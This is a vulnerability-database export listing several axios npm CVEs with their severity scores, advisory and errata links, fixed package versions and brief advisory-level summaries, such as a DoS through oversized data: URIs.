reference_url	https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-42033
reference_id
reference_type
scores
url	https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-42033

reference_url

https://github.com/axios/axios

reference_id

reference_type

scores

value	7.4
scoring_system	cvssv3.1
scoring_elements	CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:N

value	HIGH
scoring_system	generic_textual
scoring_elements

url

https://github.com/axios/axios

reference_url

https://github.com/axios/axios/security/advisories/GHSA-pf86-5x62-jrwf

reference_id

reference_type

scores

value	7.4
scoring_system	cvssv3.1
scoring_elements	CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:N

value	HIGH
scoring_system	cvssv3.1_qr
scoring_elements

value	HIGH
scoring_system	generic_textual
scoring_elements

value	Track*
scoring_system	ssvc
scoring_elements	SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2026-04-24T18:28:14Z/

url

https://github.com/axios/axios/security/advisories/GHSA-pf86-5x62-jrwf

reference_url

https://nvd.nist.gov/vuln/detail/CVE-2026-42033

reference_id

reference_type

scores

value	7.4
scoring_system	cvssv3.1
scoring_elements	CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:N

value	HIGH
scoring_system	generic_textual
scoring_elements

url

https://nvd.nist.gov/vuln/detail/CVE-2026-42033

reference_url	https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=1134878
reference_id	1134878
reference_type
scores
url	https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=1134878

reference_url	https://bugzilla.redhat.com/show_bug.cgi?id=2461607
reference_id	2461607
reference_type
scores
url	https://bugzilla.redhat.com/show_bug.cgi?id=2461607

reference_url

https://github.com/advisories/GHSA-pf86-5x62-jrwf

reference_id

GHSA-pf86-5x62-jrwf

reference_type

scores

value	HIGH
scoring_system	cvssv3.1_qr
scoring_elements

url

https://github.com/advisories/GHSA-pf86-5x62-jrwf

reference_url	https://access.redhat.com/errata/RHSA-2026:14937
reference_id	RHSA-2026:14937
reference_type
scores
url	https://access.redhat.com/errata/RHSA-2026:14937

reference_url	https://access.redhat.com/errata/RHSA-2026:16476
reference_id	RHSA-2026:16476
reference_type
scores
url	https://access.redhat.com/errata/RHSA-2026:16476

reference_url	https://access.redhat.com/errata/RHSA-2026:16532
reference_id	RHSA-2026:16532
reference_type
scores
url	https://access.redhat.com/errata/RHSA-2026:16532

reference_url	https://access.redhat.com/errata/RHSA-2026:16534
reference_id	RHSA-2026:16534
reference_type
scores
url	https://access.redhat.com/errata/RHSA-2026:16534

reference_url	https://access.redhat.com/errata/RHSA-2026:16535
reference_id	RHSA-2026:16535
reference_type
scores
url	https://access.redhat.com/errata/RHSA-2026:16535

reference_url	https://access.redhat.com/errata/RHSA-2026:16542
reference_id	RHSA-2026:16542
reference_type
scores
url	https://access.redhat.com/errata/RHSA-2026:16542

reference_url	https://access.redhat.com/errata/RHSA-2026:16874
reference_id	RHSA-2026:16874
reference_type
scores
url	https://access.redhat.com/errata/RHSA-2026:16874

reference_url	https://access.redhat.com/errata/RHSA-2026:17468
reference_id	RHSA-2026:17468
reference_type
scores
url	https://access.redhat.com/errata/RHSA-2026:17468

reference_url	https://access.redhat.com/errata/RHSA-2026:17474
reference_id	RHSA-2026:17474
reference_type
scores
url	https://access.redhat.com/errata/RHSA-2026:17474

reference_url	https://access.redhat.com/errata/RHSA-2026:17657
reference_id	RHSA-2026:17657
reference_type
scores
url	https://access.redhat.com/errata/RHSA-2026:17657

reference_url	https://access.redhat.com/errata/RHSA-2026:17699
reference_id	RHSA-2026:17699
reference_type
scores
url	https://access.redhat.com/errata/RHSA-2026:17699

reference_url	https://access.redhat.com/errata/RHSA-2026:19109
reference_id	RHSA-2026:19109
reference_type
scores
url	https://access.redhat.com/errata/RHSA-2026:19109

reference_url	https://access.redhat.com/errata/RHSA-2026:19375
reference_id	RHSA-2026:19375
reference_type
scores
url	https://access.redhat.com/errata/RHSA-2026:19375

reference_url	https://access.redhat.com/errata/RHSA-2026:20889
reference_id	RHSA-2026:20889
reference_type
scores
url	https://access.redhat.com/errata/RHSA-2026:20889

reference_url	https://access.redhat.com/errata/RHSA-2026:20938
reference_id	RHSA-2026:20938
reference_type
scores
url	https://access.redhat.com/errata/RHSA-2026:20938

reference_url	https://access.redhat.com/errata/RHSA-2026:21017
reference_id	RHSA-2026:21017
reference_type
scores
url	https://access.redhat.com/errata/RHSA-2026:21017

reference_url	https://access.redhat.com/errata/RHSA-2026:21338
reference_id	RHSA-2026:21338
reference_type
scores
url	https://access.redhat.com/errata/RHSA-2026:21338

reference_url	https://access.redhat.com/errata/RHSA-2026:21772
reference_id	RHSA-2026:21772
reference_type
scores
url	https://access.redhat.com/errata/RHSA-2026:21772

reference_url	https://access.redhat.com/errata/RHSA-2026:22465
reference_id	RHSA-2026:22465
reference_type
scores
url	https://access.redhat.com/errata/RHSA-2026:22465

reference_url	https://access.redhat.com/errata/RHSA-2026:22619
reference_id	RHSA-2026:22619
reference_type
scores
url	https://access.redhat.com/errata/RHSA-2026:22619

reference_url	https://access.redhat.com/errata/RHSA-2026:22629
reference_id	RHSA-2026:22629
reference_type
scores
url	https://access.redhat.com/errata/RHSA-2026:22629

reference_url	https://access.redhat.com/errata/RHSA-2026:22840
reference_id	RHSA-2026:22840
reference_type
scores
url	https://access.redhat.com/errata/RHSA-2026:22840

reference_url	https://access.redhat.com/errata/RHSA-2026:23361
reference_id	RHSA-2026:23361
reference_type
scores
url	https://access.redhat.com/errata/RHSA-2026:23361

fixed_packages

url pkg:npm/axios@1.15.1

purl pkg:npm/axios@1.15.1

is_vulnerable true

affected_by_vulnerabilities

vulnerability	VCID-8a5f-cd5t-mucc

vulnerability	VCID-rusx-pwdw-zqcj

resource_url http://public2.vulnerablecode.io/packages/pkg:npm/axios@1.15.1

aliases CVE-2026-42033, GHSA-pf86-5x62-jrwf

risk_score 4.0

exploitability 0.5

weighted_severity 8.0

resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-6ru1-uamj-5ud3

url VCID-8a5f-cd5t-mucc

vulnerability_id VCID-8a5f-cd5t-mucc

summary axios: Axios: Invisible JSON Response Tampering via Prototype Pollution Gadget

references

reference_url

https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2026-42044.json

reference_id

reference_type

scores

value	7.4
scoring_system	cvssv3
scoring_elements	CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:N

url

https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2026-42044.json

reference_url

https://api.first.org/data/v1/epss?cve=CVE-2026-42044

reference_id

reference_type

scores

value	0.00188
scoring_system	epss
scoring_elements	0.40549
published_at	2026-06-05T12:55:00Z

value	0.00188
scoring_system	epss
scoring_elements	0.40552
published_at	2026-06-06T12:55:00Z

url

https://api.first.org/data/v1/epss?cve=CVE-2026-42044

reference_url	https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-42044
reference_id
reference_type
scores
url	https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-42044

reference_url

https://github.com/axios/axios

reference_id

reference_type

scores

value	6.5
scoring_system	cvssv3.1
scoring_elements	CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:H/A:N

value	MODERATE
scoring_system	generic_textual
scoring_elements

url

https://github.com/axios/axios

reference_url

https://github.com/axios/axios/security/advisories/GHSA-3w6x-2g7m-8v23

reference_id

reference_type

scores

value	6.5
scoring_system	cvssv3.1
scoring_elements	CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:H/A:N

value	MODERATE
scoring_system	cvssv3.1_qr
scoring_elements

value	MODERATE
scoring_system	generic_textual
scoring_elements

value	Track
scoring_system	ssvc
scoring_elements	SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-24T18:11:49Z/

url

https://github.com/axios/axios/security/advisories/GHSA-3w6x-2g7m-8v23

reference_url

https://nvd.nist.gov/vuln/detail/CVE-2026-42044

reference_id

reference_type

scores

value	6.5
scoring_system	cvssv3.1
scoring_elements	CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:H/A:N

value	MODERATE
scoring_system	generic_textual
scoring_elements

url

https://nvd.nist.gov/vuln/detail/CVE-2026-42044

reference_url	https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=1134878
reference_id	1134878
reference_type
scores
url	https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=1134878

reference_url	https://bugzilla.redhat.com/show_bug.cgi?id=2461624
reference_id	2461624
reference_type
scores
url	https://bugzilla.redhat.com/show_bug.cgi?id=2461624

reference_url

https://github.com/advisories/GHSA-3w6x-2g7m-8v23

reference_id

GHSA-3w6x-2g7m-8v23

reference_type

scores

value	MODERATE
scoring_system	cvssv3.1_qr
scoring_elements

url

https://github.com/advisories/GHSA-3w6x-2g7m-8v23

reference_url	https://access.redhat.com/errata/RHSA-2026:16532
reference_id	RHSA-2026:16532
reference_type
scores
url	https://access.redhat.com/errata/RHSA-2026:16532

reference_url	https://access.redhat.com/errata/RHSA-2026:16534
reference_id	RHSA-2026:16534
reference_type
scores
url	https://access.redhat.com/errata/RHSA-2026:16534

reference_url	https://access.redhat.com/errata/RHSA-2026:16535
reference_id	RHSA-2026:16535
reference_type
scores
url	https://access.redhat.com/errata/RHSA-2026:16535

reference_url	https://access.redhat.com/errata/RHSA-2026:16542
reference_id	RHSA-2026:16542
reference_type
scores
url	https://access.redhat.com/errata/RHSA-2026:16542

reference_url	https://access.redhat.com/errata/RHSA-2026:17657
reference_id	RHSA-2026:17657
reference_type
scores
url	https://access.redhat.com/errata/RHSA-2026:17657

reference_url	https://access.redhat.com/errata/RHSA-2026:17699
reference_id	RHSA-2026:17699
reference_type
scores
url	https://access.redhat.com/errata/RHSA-2026:17699

reference_url	https://access.redhat.com/errata/RHSA-2026:19109
reference_id	RHSA-2026:19109
reference_type
scores
url	https://access.redhat.com/errata/RHSA-2026:19109

reference_url	https://access.redhat.com/errata/RHSA-2026:19375
reference_id	RHSA-2026:19375
reference_type
scores
url	https://access.redhat.com/errata/RHSA-2026:19375

reference_url	https://access.redhat.com/errata/RHSA-2026:20338
reference_id	RHSA-2026:20338
reference_type
scores
url	https://access.redhat.com/errata/RHSA-2026:20338

reference_url	https://access.redhat.com/errata/RHSA-2026:20454
reference_id	RHSA-2026:20454
reference_type
scores
url	https://access.redhat.com/errata/RHSA-2026:20454

reference_url	https://access.redhat.com/errata/RHSA-2026:20889
reference_id	RHSA-2026:20889
reference_type
scores
url	https://access.redhat.com/errata/RHSA-2026:20889

reference_url	https://access.redhat.com/errata/RHSA-2026:20938
reference_id	RHSA-2026:20938
reference_type
scores
url	https://access.redhat.com/errata/RHSA-2026:20938

reference_url	https://access.redhat.com/errata/RHSA-2026:21017
reference_id	RHSA-2026:21017
reference_type
scores
url	https://access.redhat.com/errata/RHSA-2026:21017

reference_url	https://access.redhat.com/errata/RHSA-2026:21338
reference_id	RHSA-2026:21338
reference_type
scores
url	https://access.redhat.com/errata/RHSA-2026:21338

reference_url	https://access.redhat.com/errata/RHSA-2026:21772
reference_id	RHSA-2026:21772
reference_type
scores
url	https://access.redhat.com/errata/RHSA-2026:21772

reference_url	https://access.redhat.com/errata/RHSA-2026:22465
reference_id	RHSA-2026:22465
reference_type
scores
url	https://access.redhat.com/errata/RHSA-2026:22465

reference_url	https://access.redhat.com/errata/RHSA-2026:22629
reference_id	RHSA-2026:22629
reference_type
scores
url	https://access.redhat.com/errata/RHSA-2026:22629

reference_url	https://access.redhat.com/errata/RHSA-2026:22840
reference_id	RHSA-2026:22840
reference_type
scores
url	https://access.redhat.com/errata/RHSA-2026:22840

reference_url	https://access.redhat.com/errata/RHSA-2026:23361
reference_id	RHSA-2026:23361
reference_type
scores
url	https://access.redhat.com/errata/RHSA-2026:23361

fixed_packages

url pkg:npm/axios@1.15.2

purl pkg:npm/axios@1.15.2

is_vulnerable true

affected_by_vulnerabilities

vulnerability	VCID-dqkm-8xjg-63hn

resource_url http://public2.vulnerablecode.io/packages/pkg:npm/axios@1.15.2

aliases CVE-2026-42044, GHSA-3w6x-2g7m-8v23

risk_score 3.4

exploitability 0.5

weighted_severity 6.7

resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-8a5f-cd5t-mucc

url VCID-axy8-kmka-pugw

vulnerability_id VCID-axy8-kmka-pugw

summary

Axios is vulnerable to DoS attack through lack of data size check
When Axios runs on Node.js and is given a URL with the `data:` scheme, it does not perform HTTP. Instead, its Node http adapter decodes the entire payload into memory (`Buffer`/`Blob`) and returns a synthetic 200 response.
This path ignores `maxContentLength` / `maxBodyLength` (which only protect HTTP responses), so an attacker can supply a very large `data:` URI and cause the process to allocate unbounded memory and crash (DoS), even if the caller requested `responseType: 'stream'`.

references

reference_url

https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2025-58754.json

reference_id

reference_type

scores

value	5.3
scoring_system	cvssv3
scoring_elements	CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L

url

https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2025-58754.json

reference_url

https://api.first.org/data/v1/epss?cve=CVE-2025-58754

reference_id

reference_type

scores

value	0.00257
scoring_system	epss
scoring_elements	0.49312
published_at	2026-06-06T12:55:00Z

value	0.00257
scoring_system	epss
scoring_elements	0.49302
published_at	2026-06-05T12:55:00Z

url

https://api.first.org/data/v1/epss?cve=CVE-2025-58754

reference_url	https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-58754
reference_id
reference_type
scores
url	https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-58754

reference_url

https://github.com/axios/axios

reference_id

reference_type

scores

value	7.5
scoring_system	cvssv3.1
scoring_elements	CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

value	HIGH
scoring_system	generic_textual
scoring_elements

url

https://github.com/axios/axios

reference_url

https://github.com/axios/axios/commit/945435fc51467303768202250debb8d4ae892593

reference_id

reference_type

scores

value	7.5
scoring_system	cvssv3.1
scoring_elements	CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

value	HIGH
scoring_system	generic_textual
scoring_elements

value	Track
scoring_system	ssvc
scoring_elements	SSVCv2/E:P/A:Y/T:P/P:M/B:A/M:M/D:T/2025-09-12T13:08:38Z/

url

https://github.com/axios/axios/commit/945435fc51467303768202250debb8d4ae892593

reference_url

https://github.com/axios/axios/commit/a1b1d3f073a988601583a604f5f9f5d05a3d0b67

reference_id

reference_type

scores

value	7.5
scoring_system	cvssv3.1
scoring_elements	CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

value	HIGH
scoring_system	generic_textual
scoring_elements

value	Track
scoring_system	ssvc
scoring_elements	SSVCv2/E:P/A:Y/T:P/P:M/B:A/M:M/D:T/2025-09-12T13:08:38Z/

url

https://github.com/axios/axios/commit/a1b1d3f073a988601583a604f5f9f5d05a3d0b67

reference_url

https://github.com/axios/axios/commit/c30252f685e8f4326722de84923fcbc8cf557f06

reference_id

reference_type

scores

value	7.5
scoring_system	cvssv3.1
scoring_elements	CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

value	HIGH
scoring_system	generic_textual
scoring_elements

value	Track
scoring_system	ssvc
scoring_elements	SSVCv2/E:P/A:Y/T:P/P:M/B:A/M:M/D:T/2025-09-12T13:08:38Z/

url

https://github.com/axios/axios/commit/c30252f685e8f4326722de84923fcbc8cf557f06

reference_url

https://github.com/axios/axios/pull/7011

reference_id

reference_type

scores

value	7.5
scoring_system	cvssv3.1
scoring_elements	CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

value	HIGH
scoring_system	generic_textual
scoring_elements

value	Track
scoring_system	ssvc
scoring_elements	SSVCv2/E:P/A:Y/T:P/P:M/B:A/M:M/D:T/2025-09-12T13:08:38Z/

url

https://github.com/axios/axios/pull/7011

reference_url

https://github.com/axios/axios/pull/7034

reference_id

reference_type

scores

value	7.5
scoring_system	cvssv3.1
scoring_elements	CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

value	HIGH
scoring_system	generic_textual
scoring_elements

value	Track
scoring_system	ssvc
scoring_elements	SSVCv2/E:P/A:Y/T:P/P:M/B:A/M:M/D:T/2025-09-12T13:08:38Z/

url

https://github.com/axios/axios/pull/7034

reference_url

https://github.com/axios/axios/releases/tag/v0.30.2

reference_id

reference_type

scores

value	7.5
scoring_system	cvssv3.1
scoring_elements	CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

value	HIGH
scoring_system	generic_textual
scoring_elements

value	Track
scoring_system	ssvc
scoring_elements	SSVCv2/E:P/A:Y/T:P/P:M/B:A/M:M/D:T/2025-09-12T13:08:38Z/

url

https://github.com/axios/axios/releases/tag/v0.30.2

reference_url

https://github.com/axios/axios/releases/tag/v1.12.0

reference_id

reference_type

scores

value	7.5
scoring_system	cvssv3.1
scoring_elements	CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

value	HIGH
scoring_system	generic_textual
scoring_elements

value	Track
scoring_system	ssvc
scoring_elements	SSVCv2/E:P/A:Y/T:P/P:M/B:A/M:M/D:T/2025-09-12T13:08:38Z/

url

https://github.com/axios/axios/releases/tag/v1.12.0

reference_url	https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=1114963
reference_id	1114963
reference_type
scores
url	https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=1114963

reference_url	https://bugzilla.redhat.com/show_bug.cgi?id=2394735
reference_id	2394735
reference_type
scores
url	https://bugzilla.redhat.com/show_bug.cgi?id=2394735

reference_url

https://nvd.nist.gov/vuln/detail/CVE-2025-58754

reference_id

CVE-2025-58754

reference_type

scores

value	7.5
scoring_system	cvssv3.1
scoring_elements	CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

value	HIGH
scoring_system	generic_textual
scoring_elements

url

https://nvd.nist.gov/vuln/detail/CVE-2025-58754

reference_url	https://github.com/advisories/GHSA-4hjh-wcwx-xvwj
reference_id	GHSA-4hjh-wcwx-xvwj
reference_type
scores
url	https://github.com/advisories/GHSA-4hjh-wcwx-xvwj

reference_url

https://github.com/axios/axios/security/advisories/GHSA-4hjh-wcwx-xvwj

reference_id

GHSA-4hjh-wcwx-xvwj

reference_type

scores

value	7.5
scoring_system	cvssv3.1
scoring_elements	CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

value	HIGH
scoring_system	generic_textual
scoring_elements

value	Track
scoring_system	ssvc
scoring_elements	SSVCv2/E:P/A:Y/T:P/P:M/B:A/M:M/D:T/2025-09-12T13:08:38Z/

url

https://github.com/axios/axios/security/advisories/GHSA-4hjh-wcwx-xvwj

reference_url	https://access.redhat.com/errata/RHSA-2025:16747
reference_id	RHSA-2025:16747
reference_type
scores
url	https://access.redhat.com/errata/RHSA-2025:16747

reference_url	https://access.redhat.com/errata/RHSA-2025:18252
reference_id	RHSA-2025:18252
reference_type
scores
url	https://access.redhat.com/errata/RHSA-2025:18252

reference_url	https://access.redhat.com/errata/RHSA-2025:19221
reference_id	RHSA-2025:19221
reference_type
scores
url	https://access.redhat.com/errata/RHSA-2025:19221

reference_url	https://access.redhat.com/errata/RHSA-2025:19335
reference_id	RHSA-2025:19335
reference_type
scores
url	https://access.redhat.com/errata/RHSA-2025:19335

reference_url	https://access.redhat.com/errata/RHSA-2025:19375
reference_id	RHSA-2025:19375
reference_type
scores
url	https://access.redhat.com/errata/RHSA-2025:19375

reference_url	https://access.redhat.com/errata/RHSA-2025:19529
reference_id	RHSA-2025:19529
reference_type
scores
url	https://access.redhat.com/errata/RHSA-2025:19529

reference_url	https://access.redhat.com/errata/RHSA-2025:19804
reference_id	RHSA-2025:19804
reference_type
scores
url	https://access.redhat.com/errata/RHSA-2025:19804

reference_url	https://access.redhat.com/errata/RHSA-2025:19961
reference_id	RHSA-2025:19961
reference_type
scores
url	https://access.redhat.com/errata/RHSA-2025:19961

reference_url	https://access.redhat.com/errata/RHSA-2025:22684
reference_id	RHSA-2025:22684
reference_type
scores
url	https://access.redhat.com/errata/RHSA-2025:22684

reference_url	https://access.redhat.com/errata/RHSA-2025:22759
reference_id	RHSA-2025:22759
reference_type
scores
url	https://access.redhat.com/errata/RHSA-2025:22759

reference_url	https://access.redhat.com/errata/RHSA-2025:23069
reference_id	RHSA-2025:23069
reference_type
scores
url	https://access.redhat.com/errata/RHSA-2025:23069

reference_url	https://access.redhat.com/errata/RHSA-2025:23131
reference_id	RHSA-2025:23131
reference_type
scores
url	https://access.redhat.com/errata/RHSA-2025:23131

reference_url	https://access.redhat.com/errata/RHSA-2025:23546
reference_id	RHSA-2025:23546
reference_type
scores
url	https://access.redhat.com/errata/RHSA-2025:23546

reference_url	https://access.redhat.com/errata/RHSA-2026:0627
reference_id	RHSA-2026:0627
reference_type
scores
url	https://access.redhat.com/errata/RHSA-2026:0627

reference_url	https://access.redhat.com/errata/RHSA-2026:0718
reference_id	RHSA-2026:0718
reference_type
scores
url	https://access.redhat.com/errata/RHSA-2026:0718

reference_url	https://access.redhat.com/errata/RHSA-2026:1018
reference_id	RHSA-2026:1018
reference_type
scores
url	https://access.redhat.com/errata/RHSA-2026:1018

reference_url	https://access.redhat.com/errata/RHSA-2026:1942
reference_id	RHSA-2026:1942
reference_type
scores
url	https://access.redhat.com/errata/RHSA-2026:1942

reference_url	https://access.redhat.com/errata/RHSA-2026:4215
reference_id	RHSA-2026:4215
reference_type
scores
url	https://access.redhat.com/errata/RHSA-2026:4215

reference_url	https://access.redhat.com/errata/RHSA-2026:6226
reference_id	RHSA-2026:6226
reference_type
scores
url	https://access.redhat.com/errata/RHSA-2026:6226

fixed_packages

url pkg:npm/axios@1.12.0

purl pkg:npm/axios@1.12.0

is_vulnerable true

affected_by_vulnerabilities

vulnerability	VCID-37kj-pzyt-8be6

vulnerability	VCID-4b7a-22xk-gbh9

vulnerability	VCID-5kg1-k416-dfc1

vulnerability	VCID-6ru1-uamj-5ud3

vulnerability	VCID-8a5f-cd5t-mucc

vulnerability	VCID-gp41-4j8d-37ce

vulnerability	VCID-hadc-5d2f-gqe6

vulnerability	VCID-jvs6-8bva-nqb3

vulnerability	VCID-kwj2-mk8c-4fef

vulnerability	VCID-rusx-pwdw-zqcj

vulnerability	VCID-td7u-cct6-bud6

vulnerability	VCID-vzqt-dj1z-bqa6

vulnerability	VCID-xdas-dhtb-nuge

vulnerability	VCID-xg1x-4spz-jucn

vulnerability	VCID-yu5y-e4bk-zyfp

vulnerability	VCID-z5pf-pqcd-ckas

resource_url http://public2.vulnerablecode.io/packages/pkg:npm/axios@1.12.0

aliases CVE-2025-58754, GHSA-4hjh-wcwx-xvwj

risk_score 4.0

exploitability 0.5

weighted_severity 8.0

resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-axy8-kmka-pugw

url VCID-gp41-4j8d-37ce

vulnerability_id VCID-gp41-4j8d-37ce

summary axios: Axios: Information disclosure due to `no_proxy` bypass

references

reference_url

https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2026-42038.json

reference_id

reference_type

scores

value	6.8
scoring_system	cvssv3
scoring_elements	CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:N/A:N

url

https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2026-42038.json

reference_url

https://api.first.org/data/v1/epss?cve=CVE-2026-42038

reference_id

reference_type

scores

value	0.00082
scoring_system	epss
scoring_elements	0.24203
published_at	2026-06-05T12:55:00Z

value	0.00082
scoring_system	epss
scoring_elements	0.24185
published_at	2026-06-06T12:55:00Z

url

https://api.first.org/data/v1/epss?cve=CVE-2026-42038

reference_url	https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-42038
reference_id
reference_type
scores
url	https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-42038

reference_url

https://github.com/axios/axios

reference_id

reference_type

scores

value	6.8
scoring_system	cvssv3.1
scoring_elements	CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:N/A:N

value	MODERATE
scoring_system	generic_textual
scoring_elements

url

https://github.com/axios/axios

reference_url

https://github.com/axios/axios/security/advisories/GHSA-m7pr-hjqh-92cm

reference_id

reference_type

scores

value	6.8
scoring_system	cvssv3.1
scoring_elements	CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:N/A:N

value	MODERATE
scoring_system	cvssv3.1_qr
scoring_elements

value	MODERATE
scoring_system	generic_textual
scoring_elements

value	Track
scoring_system	ssvc
scoring_elements	SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-27T13:46:29Z/

url

https://github.com/axios/axios/security/advisories/GHSA-m7pr-hjqh-92cm

reference_url

https://nvd.nist.gov/vuln/detail/CVE-2026-42038

reference_id

reference_type

scores

value	6.8
scoring_system	cvssv3.1
scoring_elements	CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:N/A:N

value	MODERATE
scoring_system	generic_textual
scoring_elements

url

https://nvd.nist.gov/vuln/detail/CVE-2026-42038

reference_url	https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=1134878
reference_id	1134878
reference_type
scores
url	https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=1134878

reference_url	https://bugzilla.redhat.com/show_bug.cgi?id=2461634
reference_id	2461634
reference_type
scores
url	https://bugzilla.redhat.com/show_bug.cgi?id=2461634

reference_url

https://github.com/advisories/GHSA-m7pr-hjqh-92cm

reference_id

GHSA-m7pr-hjqh-92cm

reference_type

scores

value	MODERATE
scoring_system	cvssv3.1_qr
scoring_elements

url

https://github.com/advisories/GHSA-m7pr-hjqh-92cm

fixed_packages

url pkg:npm/axios@1.15.1

purl pkg:npm/axios@1.15.1

is_vulnerable true

affected_by_vulnerabilities

vulnerability	VCID-8a5f-cd5t-mucc

vulnerability	VCID-rusx-pwdw-zqcj

resource_url http://public2.vulnerablecode.io/packages/pkg:npm/axios@1.15.1

aliases CVE-2026-42038, GHSA-m7pr-hjqh-92cm

risk_score 3.1

exploitability 0.5

weighted_severity 6.2

resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-gp41-4j8d-37ce

url VCID-hadc-5d2f-gqe6

vulnerability_id VCID-hadc-5d2f-gqe6

summary axios: Node.js: Axios: Information disclosure via CRLF injection in multipart Content-Type header

references

reference_url

https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2026-42037.json

reference_id

reference_type

scores

value	5.3
scoring_system	cvssv3
scoring_elements	CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N

url

https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2026-42037.json

reference_url

https://api.first.org/data/v1/epss?cve=CVE-2026-42037

reference_id

reference_type

scores

value	0.00096
scoring_system	epss
scoring_elements	0.26695
published_at	2026-06-05T12:55:00Z

value	0.00096
scoring_system	epss
scoring_elements	0.26685
published_at	2026-06-06T12:55:00Z

url

https://api.first.org/data/v1/epss?cve=CVE-2026-42037

reference_url	https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-42037
reference_id
reference_type
scores
url	https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-42037

reference_url

https://github.com/axios/axios

reference_id

reference_type

scores

value	5.3
scoring_system	cvssv3.1
scoring_elements	CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N

value	MODERATE
scoring_system	generic_textual
scoring_elements

url

https://github.com/axios/axios

reference_url

https://github.com/axios/axios/security/advisories/GHSA-445q-vr5w-6q77

reference_id

reference_type

scores

value	5.3
scoring_system	cvssv3.1
scoring_elements	CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N

value	MODERATE
scoring_system	cvssv3.1_qr
scoring_elements

value	MODERATE
scoring_system	generic_textual
scoring_elements

value	Track
scoring_system	ssvc
scoring_elements	SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-27T17:36:52Z/

url

https://github.com/axios/axios/security/advisories/GHSA-445q-vr5w-6q77

reference_url

https://nvd.nist.gov/vuln/detail/CVE-2026-42037

reference_id

reference_type

scores

value	5.3
scoring_system	cvssv3.1
scoring_elements	CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N

value	MODERATE
scoring_system	generic_textual
scoring_elements

url

https://nvd.nist.gov/vuln/detail/CVE-2026-42037

reference_url	https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=1134878
reference_id	1134878
reference_type
scores
url	https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=1134878

reference_url	https://bugzilla.redhat.com/show_bug.cgi?id=2461636
reference_id	2461636
reference_type
scores
url	https://bugzilla.redhat.com/show_bug.cgi?id=2461636

reference_url

https://github.com/advisories/GHSA-445q-vr5w-6q77

reference_id

GHSA-445q-vr5w-6q77

reference_type

scores

value	MODERATE
scoring_system	cvssv3.1_qr
scoring_elements

url

https://github.com/advisories/GHSA-445q-vr5w-6q77

fixed_packages

url pkg:npm/axios@1.15.1

purl pkg:npm/axios@1.15.1

is_vulnerable true

affected_by_vulnerabilities

vulnerability	VCID-8a5f-cd5t-mucc

vulnerability	VCID-rusx-pwdw-zqcj

resource_url http://public2.vulnerablecode.io/packages/pkg:npm/axios@1.15.1

aliases CVE-2026-42037, GHSA-445q-vr5w-6q77

risk_score 3.1

exploitability 0.5

weighted_severity 6.2

